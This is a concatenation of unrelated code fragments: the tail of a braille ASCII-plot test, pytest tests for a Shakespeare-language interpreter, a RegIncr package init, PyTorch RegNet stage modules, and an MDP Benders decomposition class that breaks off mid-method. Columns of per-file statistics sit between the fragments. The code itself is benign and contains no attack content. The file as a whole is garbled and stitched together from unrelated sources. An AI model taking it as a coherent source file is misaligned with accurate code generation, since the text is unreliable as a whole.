0.54250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.54000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.53000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.52000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.51000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.50000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.49000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.48000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.47000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.46000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45750000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45500000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45250000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
0.45000000 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
-----------|-|---------|---------|---------|---------|---------|---------|---------|---------|-> (X)
| 0.4500000 0.4625000 0.4750000 0.4875000 0.5000000 0.5125000 0.5250000 0.5375000 0.5500000"""
print(plot([0.5], [0.5]))
assert expected == plot([0.5], [0.5])
| 82.656716
| 105
| 0.128867
| 674
| 16,614
| 22.143917
| 0.192878
| 0.629548
| 0.002412
| 0.003216
| 0.745193
| 0.745193
| 0.744255
| 0.740235
| 0.740235
| 0.739967
| 0
| 0.114248
| 0.044842
| 16,614
| 200
| 106
| 83.07
| 0.019661
| 0.001264
| 0
| 0.7
| 0
| 0.021053
| 0.961726
| 0.794648
| 0
| 0
| 0
| 0
| 0.021053
| 1
| 0.021053
| false
| 0
| 0.010526
| 0
| 0.031579
| 0.026316
| 0
| 0
| 1
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a1f5e2e4db6bff2f10312cd454de491b3d1a964b
| 3,189
|
py
|
Python
|
shakespearelang/tests/test_assignment.py
|
zmbc/shakespeare
|
8a598d21c586c4c17442c4a71ccd291a946184d9
|
[
"MIT"
] | null | null | null |
shakespearelang/tests/test_assignment.py
|
zmbc/shakespeare
|
8a598d21c586c4c17442c4a71ccd291a946184d9
|
[
"MIT"
] | null | null | null |
shakespearelang/tests/test_assignment.py
|
zmbc/shakespeare
|
8a598d21c586c4c17442c4a71ccd291a946184d9
|
[
"MIT"
] | null | null | null |
from shakespearelang import Shakespeare
from shakespearelang.errors import ShakespeareRuntimeError
from io import StringIO
import pytest
def test_assign_character(capsys):
s = Shakespeare("Foo. Juliet, a test. Romeo, a test.")
s.run_event("[Enter Romeo and Juliet]")
assert s.state.character_by_name("Romeo").value == 0
s.run_sentence("You are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 2
s.state.character_by_name("Romeo").value = 0
s.run_sentence("You are a pig!", "Juliet")
assert s.state.character_by_name("Romeo").value == -1
captured = capsys.readouterr()
assert captured.out == ""
assert captured.err == ""
def test_errors_without_character_opposite(capsys):
s = Shakespeare("Foo. Juliet, a test. Romeo, a test. Macbeth, a test.")
s.run_event("[Enter Juliet]")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
with pytest.raises(ShakespeareRuntimeError) as exc:
s.run_sentence("You are as good as a furry animal!", "Juliet")
assert "talking to nobody" in str(exc.value).lower()
assert ">>You are as good as a furry animal!<<" in str(exc.value)
assert exc.value.interpreter == s
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
s.run_event("[Enter Macbeth and Romeo]")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
with pytest.raises(ShakespeareRuntimeError) as exc:
s.run_sentence("You are as good as a furry animal!", "Juliet")
assert "ambiguous" in str(exc.value).lower()
assert ">>You are as good as a furry animal!<<" in str(exc.value)
assert exc.value.interpreter == s
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Macbeth").value == 0
captured = capsys.readouterr()
assert captured.out == ""
assert captured.err == ""
def test_conditional(capsys):
s = Shakespeare("Foo. Juliet, a test. Romeo, a test.")
s.run_event("[Enter Romeo and Juliet]")
assert s.state.character_by_name("Romeo").value == 0
s.state.global_boolean = False
s.run_sentence("If so, you are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Romeo").value == 0
s.state.global_boolean = True
s.run_sentence("If not, you are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 0
assert s.state.character_by_name("Romeo").value == 0
s.state.global_boolean = True
s.run_sentence("If so, you are as good as a furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 2
assert s.state.character_by_name("Romeo").value == 2
s.state.global_boolean = False
s.run_sentence("If not, you are as good as a furry furry animal!", "Juliet")
assert s.state.character_by_name("Romeo").value == 4
captured = capsys.readouterr()
assert captured.out == ""
assert captured.err == ""
| 39.8625
| 80
| 0.688617
| 478
| 3,189
| 4.462343
| 0.138075
| 0.067511
| 0.140647
| 0.1594
| 0.882325
| 0.882325
| 0.873418
| 0.873418
| 0.873418
| 0.815284
| 0
| 0.00761
| 0.175917
| 3,189
| 79
| 81
| 40.367089
| 0.804033
| 0
| 0
| 0.714286
| 0
| 0
| 0.236751
| 0
| 0
| 0
| 0
| 0
| 0.492063
| 1
| 0.047619
| false
| 0
| 0.063492
| 0
| 0.111111
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b8053b7866b0ba91c07c09cec97d4386ae195f33
| 276
|
py
|
Python
|
asic/designs/examples/regincr/__init__.py
|
cornell-brg/lizard
|
7f9a78a913e64b5cfdee3a26223539ad225bd6da
|
[
"BSD-3-Clause"
] | 50
|
2019-05-22T08:43:15.000Z
|
2022-03-21T23:58:50.000Z
|
asic/designs/examples/regincr/__init__.py
|
cornell-brg/lizard
|
7f9a78a913e64b5cfdee3a26223539ad225bd6da
|
[
"BSD-3-Clause"
] | 1
|
2019-07-27T18:51:52.000Z
|
2019-08-02T01:20:22.000Z
|
asic/designs/examples/regincr/__init__.py
|
cornell-brg/lizard
|
7f9a78a913e64b5cfdee3a26223539ad225bd6da
|
[
"BSD-3-Clause"
] | 11
|
2019-12-26T06:00:48.000Z
|
2022-03-27T02:29:35.000Z
|
#=========================================================================
# regincr
#=========================================================================
from RegIncr import RegIncr
from RegIncr2stage import RegIncr2stage
from RegIncrNstage import RegIncrNstage
| 30.666667
| 74
| 0.373188
| 13
| 276
| 7.923077
| 0.384615
| 0.213592
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007937
| 0.086957
| 276
| 8
| 75
| 34.5
| 0.400794
| 0.557971
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
b808a961964888bf746075ecaa2cb27491acc908
| 1,585
|
py
|
Python
|
pytorch/network/regnet/stage.py
|
psm9733/backbone
|
b891c859f667f52127af50cb60d08081f40032fe
|
[
"BSD-2-Clause"
] | 11
|
2021-08-15T20:00:35.000Z
|
2022-01-22T12:25:07.000Z
|
pytorch/network/regnet/stage.py
|
psm9733/backbone
|
b891c859f667f52127af50cb60d08081f40032fe
|
[
"BSD-2-Clause"
] | null | null | null |
pytorch/network/regnet/stage.py
|
psm9733/backbone
|
b891c859f667f52127af50cb60d08081f40032fe
|
[
"BSD-2-Clause"
] | null | null | null |
from network.regnet.blocks import XBlock, YBlock
import torch.nn as nn
class RegNetXStage(nn.Module):
def __init__(self, activation, block_num, in_channels, block_width, bottleneck_ratio, groups=1, padding='same', dilation=1, bias=True):
super().__init__()
self.stage = nn.ModuleList([])
for index in range(0, block_num):
if index == 0:
self.stage.append(XBlock(activation, in_channels, block_width, bottleneck_ratio, 2, padding, groups, dilation, bias))
else:
self.stage.append(XBlock(activation, block_width, block_width, bottleneck_ratio, 1, padding, groups, dilation, bias))
def forward(self, input):
output = input
for xblock in self.stage:
output = xblock(output)
return output
class RegNetYStage(nn.Module):
def __init__(self, activation, block_num, in_channels, block_width, bottleneck_ratio, groups=1, padding='same', dilation=1, bias=True):
super().__init__()
self.stage = nn.ModuleList([])
for index in range(0, block_num):
if index == 0:
self.stage.append(YBlock(activation, in_channels, block_width, bottleneck_ratio, 2, padding, groups, dilation, bias))
else:
self.stage.append(YBlock(activation, block_width, block_width, bottleneck_ratio, 1, padding, groups, dilation, bias))
def forward(self, input):
output = input
for xblock in self.stage:
output = xblock(output)
return output
| 44.027778
| 140
| 0.633438
| 190
| 1,585
| 5.084211
| 0.247368
| 0.082816
| 0.124224
| 0.15528
| 0.904762
| 0.879917
| 0.879917
| 0.879917
| 0.879917
| 0.879917
| 0
| 0.010274
| 0.263091
| 1,585
| 35
| 141
| 45.285714
| 0.816781
| 0
| 0
| 0.733333
| 0
| 0
| 0.005165
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.133333
| false
| 0
| 0.066667
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
62aea76f51d6773cd1f389a27316954edf4a10d8
| 43,336
|
py
|
Python
|
scripts/constrained_MDP/MDP_Benders.py
|
ILABUTK/Benders_MDP_Dataset
|
ef3266877852a67fccbbce8a5c7c47163a740836
|
[
"MIT"
] | null | null | null |
scripts/constrained_MDP/MDP_Benders.py
|
ILABUTK/Benders_MDP_Dataset
|
ef3266877852a67fccbbce8a5c7c47163a740836
|
[
"MIT"
] | null | null | null |
scripts/constrained_MDP/MDP_Benders.py
|
ILABUTK/Benders_MDP_Dataset
|
ef3266877852a67fccbbce8a5c7c47163a740836
|
[
"MIT"
] | null | null | null |
"""
The Benders decomposition algorithm for MDP
"""
# import
import time
import logging
import numpy as np
import gurobipy as grb
class MDP_Benders:
"""
Benders Decomposition of Markov Decision Processes.
"""
def __init__(
self, name, MP, states, actions, trans_mat, reward_mat, gamma
):
"""
`name`
`MP`
`MDP`
Note that in this CLASS, s and a are indices.
"""
super().__init__()
self.start_time = time.time()
self.final_time = "nan"
self.name = name
self.MP = MP
self.state_dict = {
s: states[s] for s in range(len(states))
}
self.action_dict = {
a: actions[a] for a in range(len(actions))
}
self.trans_mat = trans_mat
self.reward_mat = reward_mat
self.gamma = gamma
self.var_theta = {
s: self.MP.getVarByName("theta_{}".format(s))
for s in self.state_dict.keys()
}
self.var_vu = {}
# ------------------------------------------------------
# constructing all subproblems first
self.subproblems, self.y_val = {}, {}
for s in self.state_dict.keys():
self.subproblems[s] = self.__build_MDP_dual(s, theta_val={
s: -1e10
for s in self.state_dict.keys()
})
# ------------------------------------------------------
self.log = False
def __build_MDP_dual(self, s, theta_val):
"""
dual of MDP, single state
`s`: key of current state
`theta_val`
"""
# Gurobi model
model = grb.Model()
model.setParam("OutputFlag", False)
